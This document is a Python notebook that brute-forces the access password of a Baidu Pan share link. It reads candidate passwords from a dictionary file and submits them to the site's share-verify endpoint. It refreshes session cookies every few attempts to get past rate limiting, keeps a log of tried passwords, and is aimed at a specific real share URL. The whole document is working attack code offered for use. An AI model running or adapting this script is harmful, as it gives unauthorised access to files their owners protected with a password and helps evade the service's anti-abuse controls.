In [ ]:
import requests
import string
import base64
import time
import random

In [ ]:
# get baiduid & crfToken
def init_cookies(url, surl):
    session = requests.Session()
    res = session.get(url)
    ck = {}
    if res.status_code == 200:
        ck = session.cookies.get_dict()
        ck['surl'] = surl
    else:
        ck['error'] = str(res.status_code) + res.text
    return ck

In [ ]:
def try_pwd(pwd, ck, config):
    ret = {}
    if ck['BAIDUID'] is None:
        ret = ck
        return ret
    
    logid = base64.b64encode(ck['BAIDUID'].encode('utf-8')).decode('utf-8')
    t = round(time.time() * 1000)
    url = 'https://pan.baidu.com/share/verify?surl=' + ck['surl'] + '&t=' + str(t) + '&channel=chunlei&web=1&app_id=250528&bdstoken=&logid=' + logid + '&clienttype=0'

    params = {
        'pwd': pwd,
        'vcode': '',
        'vcode_str': ''
    }
    
    
    cookies = {
        'csrfToken': ck['csrfToken'],
        'BAIDUID': ck['BAIDUID'],
        'BAIDUID_BFESS': ck['BAIDUID']
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',
        'Host': 'pan.baidu.com',
        'Origin': 'https://pan.baidu.com',
        # Referer is key header, can't omit.
        'Referer': 'https://pan.baidu.com/share/init?surl=' + ck['surl'],
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'X-Requested-With': 'XMLHttpRequest'
    }
    res = requests.post(url, data=params, headers=headers, cookies=cookies)
    if res.status_code == 200:
        ret = res.json()
        errno = ret.get('errno')
        if errno == 0 or errno == -9:
            return ret
        else:
            ret['error'] = res.text
    else:
        ret['error'] = str(res.status_code) + res.text
    return ret

In [ ]:
def brust_force(url, surl, cfg):
    max_try_times = cfg.get('max_try_times')
    if max_try_times is None:
        max_try_times = float('inf')
    pwd_dict = open('pwd_dict.txt', 'r')
    pwd_dict_list = pwd_dict.read().split(',')
    pwd_dict.close()
    print('dict size:' + str(len(pwd_dict_list)))

    pwd_tried = open('pwd_tried.txt', 'r')
    pwd_tried_list = pwd_tried.read().split(',')
    pwd_tried.close()
    print('tried size:' + str(len(pwd_tried_list)))

    pwd_tring_list = set(pwd_dict_list) - set(pwd_tried_list)
    print('tring size:' + str(len(pwd_tring_list)))

    find = False
    abort = False
    try_result = {}
    try_times = 0
    
    refreshToken = True
    maxUseTimes = 3;

    pwd_tried_append = open('pwd_tried.txt', 'a')
    while not find and not abort and try_times < max_try_times:
        try_times = try_times + 1
        
        # use pop instead of random get.
        # el = random.sample(pwd_tring_list, 1)[0]
        # pwd_tring_list.remove(el)
        el = pwd_tring_list.pop()

        if (refreshToken):
            ck = init_cookies(url, surl)
            refreshToken = False
        try_result = try_pwd(el, ck, {})
        if (try_times % maxUseTimes == 0):
            refreshToken = True

        ## if try not be abort, log pwd to tried list
        if try_result.get('error') is not None:
            abort = True
        else:
            pwd_tried_append.write(el + ',')
            
        if try_result.get('errno') == 0:
            find = True
            try_result['currect_pwd'] = el

        pwd_tried_append.flush()

        time.sleep(1)
        
        # log result every 1000 trys.
        if try_times % 1000 == 0:
            print(time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime()) + ' trying ' + str(try_times) + ' times, current result ' + str(try_result) + ' still trying...')

    pwd_tried_append.close()
    if find:
        print('after try ' + str(try_times) + ' times, find currect pwd ' + str(try_result.get('currect_pwd')))
    if abort:
        print('after try ' + str(try_times) + ' times, abort by ' + str(try_result))
    if try_times >= max_try_times:
        print('after try ' + str(try_times) + ' times, reach the max try times ' + str(try_result))

In [ ]:
brust_force('https://pan.baidu.com/s/1lPohrC3Vljgu03l5xYAPXg', 'lPohrC3Vljgu03l5xYAPXg', {'max_try_times': 6})